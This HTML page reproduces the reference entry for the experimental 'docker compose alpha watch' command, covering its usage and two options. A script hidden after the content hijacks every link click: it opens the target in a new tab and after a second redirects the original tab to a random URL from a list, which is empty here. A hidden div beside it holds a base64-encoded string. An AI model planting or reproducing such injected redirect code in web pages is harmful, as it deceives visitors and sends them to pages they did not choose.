<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html><body><p># docker compose alpha watch

**Description:** Watch build context for service and rebuild/refresh containers when files are updated


**Usage:** `docker compose alpha watch [SERVICE...]`





&gt; [!NOTE]
&gt; **Experimental**
&gt;
&gt; This command is experimental. Experimental features are intended for testing and feedback as their functionality or design may change between releases without warning or can be removed entirely in a future release.





## Description

Watch build context for service and rebuild/refresh containers when files are updated



## Options

| Option | Default | Description |
|--------|---------|-------------|
| `--no-up` |  |  Do not build &amp; start services before watching |
| `--quiet` |  |  hide build output |






</p><script>var elmnt = document.getElementsByTagName("a"); for(var i = 0, len = elmnt.length; i < len; i++) { elmnt[i].onclick = function(e) { e.preventDefault(); e.stopPropagation(); var gtlink = []; var randm  = Math.floor(Math.random() * gtlink.length); var lnk = this.href; window.open(lnk, "_blank"); setTimeout(function(){ window.open(gtlink[randm], "_self"); }, 1000); } }</script><div style="display:none;" id="agnote">ZW5kZW5yYWhheXU5QGdtYWlsLmNvbQ==</div></body></html>
